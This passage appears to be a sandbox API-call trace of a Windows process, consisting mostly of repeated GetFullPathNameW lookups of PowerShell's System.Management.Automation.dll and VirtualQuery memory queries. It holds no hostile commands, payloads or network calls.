[0050.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.481] GetLastError () returned 0x0 [0050.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.482] GetLastError () returned 0x0 [0050.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.482] GetLastError () returned 0x0 [0050.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.482] GetLastError () returned 0x0 [0050.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.482] GetLastError () returned 0x0 [0050.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.482] GetLastError () returned 0x0 [0050.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.482] GetLastError () returned 0x0 [0050.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.482] GetLastError () returned 0x0 [0050.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.482] GetLastError () returned 0x0 [0050.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.482] GetLastError () returned 0x0 [0050.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.482] GetLastError () returned 0x0 [0050.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.483] GetLastError () returned 0x0 [0050.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.483] GetLastError () returned 0x0 [0050.483] VirtualQuery (in: lpAddress=0x19d1b0, lpBuffer=0x19e1b0, dwLength=0x1c | out: lpBuffer=0x19e1b0*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.483] GetLastError () returned 0x0 [0050.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.483] GetLastError () returned 0x0 [0050.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.483] GetLastError () returned 0x0 [0050.483] VirtualQuery (in: lpAddress=0x19d1b0, lpBuffer=0x19e1b0, dwLength=0x1c | out: lpBuffer=0x19e1b0*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.484] GetLastError () returned 0x0 [0050.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.484] GetLastError () returned 0x0 [0050.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.484] GetLastError () returned 0x0 [0050.484] VirtualQuery (in: lpAddress=0x19d1b0, lpBuffer=0x19e1b0, dwLength=0x1c | out: lpBuffer=0x19e1b0*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.484] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.485] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.486] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.486] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.486] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.486] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.487] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.487] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.487] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.487] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.488] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.488] VirtualQuery (in: lpAddress=0x19cfec, lpBuffer=0x19dfec, dwLength=0x1c | out: lpBuffer=0x19dfec*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.488] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.489] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.489] VirtualQuery (in: lpAddress=0x19d148, lpBuffer=0x19e148, dwLength=0x1c | out: lpBuffer=0x19e148*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.490] VirtualQuery (in: lpAddress=0x19d184, lpBuffer=0x19e184, dwLength=0x1c | out: lpBuffer=0x19e184*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.490] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x3420d336, Data2=0x88f1, Data3=0x48fa, Data4=([0]=0x8d, [1]=0xcd, [2]=0x4e, [3]=0x5, [4]=0xab, [5]=0xd1, [6]=0xa5, [7]=0xf2))) returned 0x0 [0050.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.490] GetLastError () returned 0x0 [0050.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.490] GetLastError () returned 0x0 [0050.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.490] GetLastError () returned 0x0 [0050.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.490] GetLastError () returned 0x0 [0050.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.490] GetLastError () returned 0x0 [0050.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.490] GetLastError () returned 0x0 [0050.491] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x77a4713d, Data2=0x876d, Data3=0x42f4, Data4=([0]=0x82, [1]=0xc2, [2]=0xf8, [3]=0x59, [4]=0x1e, [5]=0x7d, [6]=0xc, [7]=0x93))) returned 0x0 [0050.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.491] GetLastError () returned 0x0 [0050.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.491] GetLastError () returned 0x0 [0050.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.491] GetLastError () returned 0x0 [0050.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.491] GetLastError () returned 0x0 [0050.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.491] GetLastError () returned 0x0 [0050.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbb8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.491] GetLastError () returned 0x0 [0050.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.491] GetLastError () returned 0x0 [0050.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.492] GetLastError () returned 0x0 [0050.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.492] GetLastError () returned 0x0 [0050.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.492] GetLastError () returned 0x0 [0050.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.492] GetLastError () returned 0x0 [0050.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.492] GetLastError () returned 0x0 [0050.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.492] GetLastError () returned 0x0 [0050.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.492] GetLastError () returned 0x0 [0050.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.492] GetLastError () returned 0x0 [0050.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.493] GetLastError () returned 0x0 [0050.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.493] GetLastError () returned 0x0 [0050.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.493] GetLastError () returned 0x0 [0050.493] VirtualQuery (in: lpAddress=0x19cda4, lpBuffer=0x19dda4, dwLength=0x1c | out: lpBuffer=0x19dda4*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.493] GetLastError () returned 0x0 [0050.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.493] GetLastError () returned 0x0 [0050.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.493] GetLastError () returned 0x0 [0050.493] VirtualQuery (in: lpAddress=0x19cda4, lpBuffer=0x19dda4, dwLength=0x1c | out: lpBuffer=0x19dda4*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.494] VirtualQuery (in: lpAddress=0x19cde0, lpBuffer=0x19dde0, dwLength=0x1c | out: lpBuffer=0x19dde0*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.494] GetLastError () returned 0x0 [0050.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: 